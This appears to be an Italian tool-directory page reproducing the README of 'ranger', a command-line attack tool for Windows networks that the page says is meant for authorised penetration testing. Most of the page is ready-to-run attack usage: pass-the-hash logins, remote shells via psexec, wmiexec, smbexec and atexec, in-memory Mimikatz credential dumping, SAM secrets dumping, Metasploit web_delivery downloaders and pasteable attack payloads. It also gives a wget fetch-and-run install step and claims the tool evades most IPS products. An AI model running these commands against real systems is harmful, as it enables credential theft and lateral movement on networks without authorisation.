Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ranger — Uno strumento per professionisti della sicurezza per accedere e interagire con sistemi remoti basati su Microsoft Windows. | Kitploit
Strumenti/GitHubGitHub/funkandwagnalls/ranger
Generazione di PayloadExploitMovimento LateralePost-ExploitPenetration TestingCommand and Control
GitHubfunkandwagnalls/ranger

ranger

Uno strumento per professionisti della sicurezza per accedere e interagire con sistemi remoti basati su Microsoft Windows.

Vedi Repository
431821610 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ranger

Uno strumento per supportare i professionisti della sicurezza nell'accesso e nell'interazione con sistemi Microsoft Windows remoti.

Questo progetto è stato concepito con il pensiero che non abbiamo inventato l'arco o la freccia, solo un modo più efficiente di usarli.

Ranger è uno strumento di attacco e penetration testing a riga di comando, in grado di utilizzare un server catapulta istanziato per fornire capacità contro sistemi Windows. Finché un utente ha un insieme di credenziali o un insieme di hash (NTLM, LM, LM:NTLM) può ottenere l'accesso ai sistemi che fanno parte del trust.

Utilizzando questa capacità, un professionista della sicurezza può estrarre credenziali dalla memoria in chiaro, accedere alle tabelle SAM, eseguire comandi, script PowerShell, binari Windows e altri strumenti.
Al momento, lo strumento bypassa la maggior parte delle soluzioni IPS dei vendor, a meno che non siano state appositamente configurate per rilevarlo. Lo strumento è stato sviluppato utilizzando i nostri home lab per supportare i professionisti della sicurezza in attività legalmente e/o contrattualmente autorizzate.

Altre funzionalità verranno aggiunte, ma al momento lo strumento utilizza i contributi della community da repository relativi ai team di PowerShell PowerView, PowerShell Mimikatz e Impacket.

Gestione di Ranger:

Installazione:

wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Aggiornamento:

ranger --update

Utilizzo:

  • Ranger utilizza una combinazione di metodi e attacchi; un metodo viene utilizzato per erogare un attacco/comando
  • Un attacco è ciò che si intende realizzare
  • Alcuni elementi sono sia metodo che attacco combinati, e alcuni metodi non possono utilizzare alcuni attacchi a causa di limitazioni attuali nelle librerie o nei protocolli

Metodi e Attacchi:

--scout
--secrets-dump

Metodo:

--wmiexec
--psexec
--smbexec
--atexec

Attacco:

--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

##Esecuzione dei Comandi: ###Trova Utenti Collegati:

ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

###Shell Comandi SMBEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

###Shell Comandi PSEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

###Esecuzione Comandi PSEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

###Esecuzione Comandi WMIEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

###Iniettore Memoria PowerShell Mimikatz WMIEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

###Iniettore Memoria Metasploit web_delivery WMIEXEC (richiede configurazione Metasploit, vedi sotto):

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

###Iniettore Memoria Codice Personalizzato WMIEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"

###Esecuzione Comandi ATEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

###Iniettore Memoria PowerShell Mimikatz ATEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder

###Iniettore Memoria Metasploit web_delivery ATEXEC (richiede configurazione Metasploit, vedi sotto):

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder

###Iniettore Memoria Codice Personalizzato ATEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder

###Iniettore Memoria Codice Personalizzato SECRETSDUMP:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

###Crea Attacco Mimikatz Incollabile:

ranger.py --invoker -q -v -vv -vvv

###Crea Attacco web_delivery Incollabile (richiede configurazione Metasploit, vedi sotto):

ranger.py --downloader -q -v -vv -vvv

###Crea Attacco Executor Incollabile:

ranger.py --executor -q -v -vv -vvv

Identificazione Membri dei Gruppi e Domini

  • Quando si identificano i gruppi, assicurarsi di determinare il dominio di query effettivo con --get-domain-membership
  • Poi, quando si interroga un gruppo, utilizzare l'opzione facoltativa --domain, che consente di puntare a un dominio diverso da quello in cui si è effettuato l'accesso
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

##Note sull'Utilizzo: ###Formato File Credenziali:

  • È possibile passare un elenco di nomi utente e password o hash nel formato seguente nello stesso file:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM  domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain

###Avvertenze sul File Credenziali:

  • Se si forniscono nomi di dominio nel file, verranno utilizzati al posto del WORKGROUP predefinito.
  • Se si fornisce il nome del dominio tramite riga di comando -d, si presuppone che si desideri ignorare tutti i nomi di dominio nel file.

###Esecuzione da Riga di Comando:

  • Se non si desidera utilizzare il file, è possibile passare i dettagli direttamente tramite riga di comando.
  • Se si desidera fornire hash anziché password, basta passarli tramite l'argomento password.
  • Se sono in formato PWDUMP e non si fornisce un nome utente, il nome utente verrà estratto dall'hash.
  • Se si fornisce un nome utente, si presuppone che lo stesso hash si applichi a un utente diverso.
  • Utilizzare i seguenti formati per la password:
password
LM:NTLM
:NTLM
PWDUMP

###Target ed Esclusioni:

  • Target ed esclusioni possono essere utilizzati contemporaneamente

####Target, Intervalli di Target, CIDR di Target, Elenchi di Target, Target da XML NMAP:

  • È possibile fornire un elenco di target utilizzando un elenco di target o tramite l'opzione target.
  • È possibile fornire più file di elenco di target separandoli con virgole; i dati verranno aggregati e i duplicati rimossi, e verrà escluso il proprio indirizzo IP dall'interfaccia predefinita o da quella fornita.
  • Lo strumento accetta notazioni CIDR, intervalli piccoli (192.168.195.1-100) o intervalli grandi (192.168.194.1-192.163.1.1) o indirizzi IP singoli.
  • Ancora una volta, basta separarli con virgole nella riga di comando o inserirli in un file con delimitazione di nuova riga.
  • È possibile utilizzare anche XML Nmap per individuare i sistemi target; anche questi possono essere separati da virgole
  • Lo strumento normalizzerà e rimuoverà i duplicati prima di puntare alle macchine
  • ESEMPIO: -t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml

####Esclusioni, Intervalli di Esclusione, CIDR di Esclusione, Elenchi di Esclusione, Esclusioni da XML Nmap:

  • È possibile escludere i target anche utilizzando gli argomenti di esclusione; quindi se non si tocca una piccola Classe C all'interno di una Classe A, lo strumento lo gestirà per voi.
  • Le esclusioni possono essere effettuate esattamente nello stesso modo dei target; basta sostituire la t nei comandi con e
  • ESEMPIO: -e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml
Scarica lo strumento